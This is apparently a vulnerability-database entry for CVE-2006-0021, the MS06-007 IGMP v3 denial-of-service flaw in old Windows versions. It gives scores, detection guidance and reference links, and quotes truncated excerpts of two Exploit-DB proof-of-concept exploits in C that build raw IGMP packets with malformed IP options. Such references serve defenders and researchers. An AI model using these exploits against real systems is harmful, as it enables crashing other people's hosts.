CVE-2006-0021
published 2006-02-14CVE-2006-0021: Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP…
PriorityP346high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
62.88%
99.1th percentile
Microsoft Windows XP SP1 and SP2, and Server 2003 up to SP1, allows remote attackers to cause a denial of service (hang) via an IGMP packet with an invalid IP option, aka the "IGMP v3 DoS Vulnerability."
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
| microsoft | windows_2003_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect IGMP packets with an invalid/oversized IP header length (IHL=7, indicating 28 bytes of IP header with malformed options) targeting Windows hosts — characteristic of the MS06-007 DoS trigger. ↗
- →The exploit sends a raw IGMP packet using SOCK_RAW/IPPROTO_RAW with IP_HDRINCL set (setsockopt IP option 2), requiring Administrator/root privileges on the sending host — lateral movement or insider threat scenarios should be considered. ↗
- →Affected targets are Windows XP SP1/SP2 and Windows Server 2003 up to SP1; any IGMP packet with an invalid IP option field received by these systems can cause a hang (kernel-level DoS). ↗
- ·The Windows Firewall must be disabled on the victim for the raw IGMP packet to be processed; environments with host-based firewalls enabled may not be vulnerable to remote exploitation. ↗
- ·The Linux-based PoC (exploit 1603) requires the attacker to run as root to open a raw socket (SOCK_RAW/IPPROTO_RAW); the Windows-based PoC (exploit 1599) requires Administrator rights on the sending system. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)
exploitdb·2006-03-22
CVE-2006-0021 Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (2)
---
/* MS06-007 Denial of Service POC exploit
created by Firestorm, based on zloSend.exe win32 exploit (http://www.securitylab.ru/poc/264136.php)
Tested on Windows XP SP2 as victim (compiled/runned on Fedore Core 4 x86)
FOR EDUCATIONAL PURPOSE ONLY !!! */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct iphdr
{
unsigned char ihl:4, version:4, tos;
unsigned short tot_len, id, frag_off;
unsigned char ttl, protocol;
unsigned short check;
unsigned int saddr, daddr;
unsigned int options1;
unsigned int options2;
};
struct igmpv3_query {
unsigned char type;
unsigned char code;
unsigned short csum;
unsigned int group;
unsigned char qqic;
unsigned char qrv:3,
suppress:1,
resv:4
Exploit-DB
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)
exploitdb·2006-03-21
CVE-2006-0021 Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)
Microsoft Windows XP/2003 - IGMP v3 Denial of Service (MS06-007) (1)
---
/*
IGMP v3 DoS Exploit
ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx
by Alexey Sintsov ([email protected])
Req:
Administrator rights on system
Windows Firewall off (for sending RAW packets)
Affected Products:
Microsoft Corporation Windows XP All
Microsoft Corporation Windows Server 2003 All
*/
#include
#include
#pragma comment(lib, "Ws2_32.lib")
typedef struct iphdr
{
unsigned char verlen; // IP version & length
unsigned char tos; // Type of service
unsigned short total_len; // Total length of the packet
unsigned short ident; // Unique identifier
unsigned short frag_and_flags; // Flags
unsigned char ttl; // Tim
No writeups or analysis indexed.
http://secunia.com/advisories/18853http://securitytracker.com/id?1015629http://www.kb.cert.org/vuls/id/839284http://www.securiteam.com/exploits/5PP0T0KI0O.htmlhttp://www.securityfocus.com/archive/1/482658/30/4350/threadedhttp://www.securityfocus.com/bid/16645http://www.us-cert.gov/cas/techalerts/TA06-045A.htmlhttp://www.vupen.com/english/advisories/2006/0576https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-007https://exchange.xforce.ibmcloud.com/vulnerabilities/24489https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1310https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1425https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1647https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1662https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A678https://www.exploit-db.com/exploits/1599http://secunia.com/advisories/18853http://securitytracker.com/id?1015629http://www.kb.cert.org/vuls/id/839284http://www.securiteam.com/exploits/5PP0T0KI0O.htmlhttp://www.securityfocus.com/archive/1/482658/30/4350/threadedhttp://www.securityfocus.com/bid/16645http://www.us-cert.gov/cas/techalerts/TA06-045A.htmlhttp://www.vupen.com/english/advisories/2006/0576https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-007https://exchange.xforce.ibmcloud.com/vulnerabilities/24489https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1310https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1425https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1647https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1662https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A678https://www.exploit-db.com/exploits/1599
2006-02-14
Published